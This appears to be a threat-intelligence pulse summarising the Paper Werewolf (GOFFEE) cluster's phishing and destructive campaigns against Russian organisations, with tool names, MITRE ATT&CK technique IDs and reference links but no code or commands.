Espionage cluster Paper Werewolf engages in destructive behavior

Dec. 26, 2024, 8:50 p.m.

Description

The Paper Werewolf cluster, also known as GOFFEE, has increased its activity, targeting Russian organizations in government, energy, finance, and media sectors. Their primary method involves phishing emails with malicious Microsoft Word attachments containing macros. The group has evolved from cyber espionage to actively disrupting compromised infrastructures. They utilize PowerShell scripts, custom malware, and post-exploitation frameworks like Mythic. The attackers employ techniques such as reverse shells, credential interception, and destructive actions like changing passwords and deleting registry keys. Their arsenal includes tools like PowerRAT, Owowa, and Chisel. The group's sophisticated approach combines open-source frameworks with custom implants, making detection challenging.

External References

https://bi-zone.medium.com/espionage-cluster-paper-werewolf-engages-in-destructive-behavior-fd8781418ada
https://otx.alienvault.com/pulse/676c67249c229f13dfcb11bb
Tags
phishing
powershell
powerrat
2024-12-25
qwakmyagent
goffee
powertaskel
freyja
owowa

Date

  • Created: Dec. 25, 2024, 8:12 p.m.
  • Published: Dec. 25, 2024, 8:12 p.m.
  • Modified: Dec. 26, 2024, 8:50 p.m.

Attack Patterns

  • Freyja
  • QwakMyAgent
  • PowerTaskel
  • Owowa
  • PowerRAT
  • Paper Werewolf
  • T1021.002
  • T1543.003
  • T1564.001
  • T1531
  • T1059.001
  • T1547.001
  • T1070.004
  • T1204.002
  • T1082
  • T1219
  • T1036
  • T1098
  • T1027
  • T1041
  • T1566
  • T1090
  • T1078
  • T1003

Additional Informations

  • Media
  • Energy
  • Finance
  • Government
  • Russian Federation